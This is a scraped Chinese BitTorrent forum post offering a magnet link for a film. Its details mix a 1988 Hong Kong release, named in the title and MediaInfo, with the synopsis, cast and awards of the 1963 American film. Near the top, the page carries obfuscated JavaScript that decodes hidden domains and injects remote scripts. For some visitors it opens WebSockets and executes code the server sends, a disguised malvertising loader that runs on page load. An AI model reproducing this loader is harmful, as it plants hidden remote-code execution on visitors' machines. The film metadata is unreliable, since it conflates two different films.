疯狂世界[粤语音轨/中文字幕].Its.a.Mad.Mad.Mad.World.2.1988.1080p.迅雷下载 9.75GB

版主小s 28天前 270

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 疯狂世界

◎片 名 It's a Mad Mad Mad Mad World

◎年 代 1963

◎产 地 美国

◎类 别 喜剧 / 犯罪 / 冒险

◎语 言 英语

◎上映日期 1963-12-03(英国)

◎IMDb链接 https://www.imdb.com/title/tt0057193/

◎豆瓣评分 7.5/10 (628人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293508/

◎片 长 USA: 154 分钟(edited version)

◎导 演 斯坦利·克雷默 Stanley Kramer (id:1027460)

威廉·赫兹 William T. Hurtz (id:1001183)

比尔·莫伦茨 Bill Melendez (id:1041782)

◎编 剧 威廉·罗斯 William Rose (id:1143973)

◎演 员 斯宾塞·屈塞 Spencer Tracy (id:1002743)

米尔顿·伯利 Milton Berle (id:1010693)

席德·西泽 Sid Caesar (id:1049798)

巴迪·哈克特 Buddy Hackett (id:1049833)

埃塞尔·默尔曼 Ethel Merman (id:1016701)

米基·鲁尼 Mickey Rooney (id:1054487)

迪克·肖恩 Dick Shawn (id:1148344)

菲尔·西尔沃斯 Phil Silvers (id:1048240)

特里-托马斯 Terry-Thomas (id:1156580)

乔纳森·温特斯 Jonathan Winters (id:1041129)

伊迪·亚当斯 Edie Adams (id:1000361)

多萝茜·普罗文妮 Dorothy Provine (id:1004901)

埃迪·安德森 Eddie 'Rochester' Anderson (id:1050163)

吉姆·巴克斯 Jim Backus (id:1032049)

本·布卢 Ben Blue (id:1066873)

乔·E·布朗 Joe E. Brown (id:1027074)

艾伦·卡尼 Alan Carney (id:1037383)

奇克·坎德勒 Chick Chandler (id:1016802)

Barrie Chase Barrie Chase (id:1077483)

劳埃德·科里根 Lloyd Corrigan (id:1028249)

威廉·德马雷斯特 William Demarest (id:1087199)

安迪·德怀恩 Andy Devine (id:1027947)

塞尔玛·戴蒙德 Selma Diamond (id:1090606)

彼得·法尔克 Peter Falk (id:1049632)

诺曼·费尔 Norman Fell (id:1055940)

保罗·福特 Paul Ford (id:1079810)

斯坦·弗雷贝格 Stan Freberg (id:1082305)

莱奥·乔西 Leo Gorcey (id:1018159)

斯特灵·哈洛威 Sterling Holloway (id:1014048)

马尔温·卡普兰 Marvin Kaplan (id:1113990)

爱德华·艾沃瑞特·霍顿 Edward Everett Horton (id:1032256)

巴斯特·基顿 Buster Keaton (id:1031792)

唐·诺茨 Don Knotts (id:1010611)

查尔斯·莱恩 Charles Lane (id:1113350)

迈克·马祖尔凯 Mike Mazurki (id:1120651)

查尔斯·麦格劳 Charles McGraw (id:1121981)

克里夫·诺顿 Cliff Norton (id:1131494)

扎苏·皮茨 Zasu Pitts (id:1016729)

卡尔·雷纳 Carl Reiner (id:1032081)

马德琳·鲁 Madlyn Rhue (id:1146539)

罗伊·罗伯茨 Roy Roberts (id:1032406)

阿诺德·斯唐 Arnold Stang (id:1027979)

Nick Stewart Nick Stewart (id:1149695)

Sammee Tong Sammee Tong (id:1160501)

杰西·怀特 Jesse White (id:1161367)

吉米·杜兰特 Jimmy Durante (id:1004980)

Morey Amsterdam Morey Amsterdam (id:1036824)

菲尔·阿诺德 Phil Arnold (id:1059571)

杰克·本尼 Jack Benny (id:1004930)

保罗·伯奇 Paul Birch (id:1066068)

Lovyss Bradley Lovyss Bradley (id:1073825)

乔治布鲁格曼 George Bruggeman (id:1072180)

Albert Cavens Albert Cavens (id:1076904)

Noble 'Kid' Chissel Noble 'Kid' Chissel (id:1069260)

约翰·克拉克 John Clarke (id:1077258)

斯坦利·克莱门茨 Stanley Clements (id:1012641)

Joe DeRita Joe DeRita (id:1083996)

金·多诺万 King Donovan (id:1007204)

明塔·德菲 Minta Durfee (id:1028629)

罗伊·恩格尔 Roy Engel (id:1083495)

拉里·费恩 Larry Fine (id:1056018)

詹姆斯·弗莱文 James Flavin (id:1079423)

Sig Frohlich Sig Frohlich (id:1080996)

Nicholas Georgiade Nicholas Georgiade (id:1092627)

Bobby Gilbert Bobby Gilbert (id:1100792)

斯泰西·哈里斯 Stacy Harris (id:1099559)

唐·C·哈维 Don C. Harvey (id:1096780)

Al Haskell Al Haskell (id:1094886)

摩尔·霍华德 Moe Howard (id:1019119)

约翰·因德里萨诺 John Indrisano (id:1104545)

艾伦·詹金斯 Allen Jenkins (id:1114559)

罗伯特·卡恩斯 Robert Karnes (id:1106703)

汤姆·肯尼迪 Tom Kennedy (id:1111258)

哈里·劳特 Harry Lauter (id:1106657)

本·莱西 Ben Lessy (id:1120053)

博博·刘易斯 Bobo Lewis (id:1120527)

杰瑞·刘易斯 Jerry Lewis (id:1032000)

泰勒麦克维 Tyler McVey (id:1116102)

Monty O'Grady Monty O'Grady (id:1132002)

芭芭拉佩帕 Barbara Pepper (id:1128575)

埃利奥特·里德 Elliott Reid (id:1143872)

埃迪·赖德 Eddie Ryder (id:1008110)

查尔兹·歇洛克 Charles Sherlock (id:1147757)

Eddie Smith Eddie Smith (id:1159012)

Cap Somers Cap Somers (id:1154093)

保罗·索伦森 Paul Sorensen (id:1160314)

Ray Spiker Ray Spiker (id:1159546)

Max Wagner Max Wagner (id:1165974)

David Ward David Ward (id:1162770)

罗伯特·C·琼斯 Robert C. Jones (id:1276269)

儒道夫·斯特纳德 Rudolph Sternad (id:1298411)

Rolf Miller Rolf Miller (id:1292107)

吉姆·丹弗斯 Jim Danforth (id:1281771)

詹姆斯·B·戈登 James B. Gordon (id:1285183)

◎标 签 喜剧 / 美国 / 1963 / 1960s / 美国电影 / 犯罪 / CC / StanleyKramer

◎简 介

斯坦利.克雷默执导,联美公司制作的本片,讲述的是一个反映人性阴暗面的生活剧。史马尔考文超车坠崖身亡,在临死前透露在圣塔罗西公园埋着一大笔钱。知道这个消息的有八个人,各种不同的身份、不同的背景、不同的职业,为了独得这份意外之财,分别展开了可笑、惊险、疯狂的争夺。谁知他们所争夺的是15前被抢劫的赃款,他们所作的一切都在警方的掌握之中。宝藏终于被挖出,克劳派队长因为退休在即,而退休金又少得可怜,所以便假公济私,夺款潜逃,但最终被警方抓获,使发财梦想成为泡影。本片以嬉笑怒骂的方式,将人性的丑陋形态一表无遗,将人物角色刻划得入木三分,虽闻笑声,但却可见编导的良苦用心。

◎获奖情况 (共8项)

第36届奥斯卡金像奖 (1964)

彩色片最佳摄影(提名)

└──厄内斯特`拉斯洛 (id:1048432)

最佳剪辑(提名)

└──弗雷德里克·努德森 (id:1003773)

└──小吉恩·福勒 (id:1019636)

└──罗伯特·C·琼斯 (id:1276269)

最佳音响(提名)

└──戈登·索耶尔 (id:1146400)

最佳音效

└──沃尔特·艾略特 (id:1080593)

最佳配乐(提名)

└──厄内斯特·高德 (id:1012701)

最佳原创歌曲(提名)

└──厄内斯特·高德 (id:1012701)

└──麦克·大卫 (id:1080974)

第21届金球奖 (1964)

电影类 最佳音乐/喜剧片(提名)

电影类 音乐/喜剧片最佳男主角(提名)

└──乔纳森·温特斯 (id:1041129)

  1. General

  2. Unique ID : 105539619757068681666477880711251758083 (0x4F6630FFA6E1B1A693102CF7D4F40C03)

  3. Complete name : Its.a.Mad.Mad.Mad.World.2.1988.1080p.BluRay.x264.DTS.2Audio-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.75 GiB

  7. Duration : 1 h 32 min

  8. Overall bit rate : 15.1 Mb/s

  9. Movie name : Its a Mad Mad Mad World 2 1988

  10. Encoded date : UTC 2021-06-26 01:34:02

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 32 min

  25. Bit rate : 12.0 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 032 pixels

  28. Display aspect ratio : 1.85:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.253

  36. Stream size : 7.76 GiB (80%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.75 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 32 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 510 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 999 MiB (10%)

  57. Title : Cantonese

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : DTS

  64. Format/Info : Digital Theater Systems

  65. Codec ID : A_DTS

  66. Duration : 1 h 32 min

  67. Bit rate mode : Constant

  68. Bit rate : 1 510 kb/s

  69. Channel(s) : 6 channels

  70. Channel layout : C L R Ls Rs LFE

  71. Sampling rate : 48.0 kHz

  72. Frame rate : 93.750 FPS (512 SPF)

  73. Bit depth : 24 bits

  74. Compression mode : Lossy

  75. Stream size : 999 MiB (10%)

  76. Title : Mandarin

  77. Language : Chinese

  78. Default : Yes

  79. Forced : No


  80. Text #1

  81. ID : 4

  82. ID in the original source medium : 4608 (0x1200)

  83. Format : PGS

  84. Muxing mode : zlib

  85. Codec ID : S_HDMV/PGS

  86. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration : 1 h 29 min

  88. Bit rate : 53.2 kb/s

  89. Count of elements : 3519

  90. Stream size : 34.1 MiB (0%)

  91. Title : cht

  92. Language : Chinese

  93. Default : Yes

  94. Forced : No

  95. Original source medium : Blu-ray


  96. Text #2

  97. ID : 5

  98. ID in the original source medium : 4609 (0x1201)

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 29 min

  104. Bit rate : 52.0 kb/s

  105. Count of elements : 3521

  106. Stream size : 33.3 MiB (0%)

  107. Title : chs

  108. Language : Chinese

  109. Default : Yes

  110. Forced : No

  111. Original source medium : Blu-ray


  112. Text #3

  113. ID : 6

  114. ID in the original source medium : 4610 (0x1202)

  115. Format : PGS

  116. Muxing mode : zlib

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 29 min

  120. Bit rate : 54.0 kb/s

  121. Count of elements : 3521

  122. Stream size : 34.6 MiB (0%)

  123. Language : English

  124. Default : Yes

  125. Forced : No

  126. Original source medium : Blu-ray


  127. Menu

  128. 00:00:00.000 : Chapter 01

  129. 00:09:20.208 : Chapter 02

  130. 00:14:44.708 : Chapter 03

  131. 00:23:09.375 : Chapter 04

  132. 00:30:12.833 : Chapter 05

  133. 00:37:56.375 : Chapter 06

  134. 00:45:27.666 : Chapter 07

  135. 00:52:55.958 : Chapter 08

  136. 00:59:49.625 : Chapter 09

  137. 01:09:40.750 : Chapter 10

  138. 01:17:12.208 : Chapter 11

  139. 01:26:08.541 : Chapter 12


TAGS 冒险 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:6ACAF140EDACFFEB31EB3079AF29F12E69E90E24
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回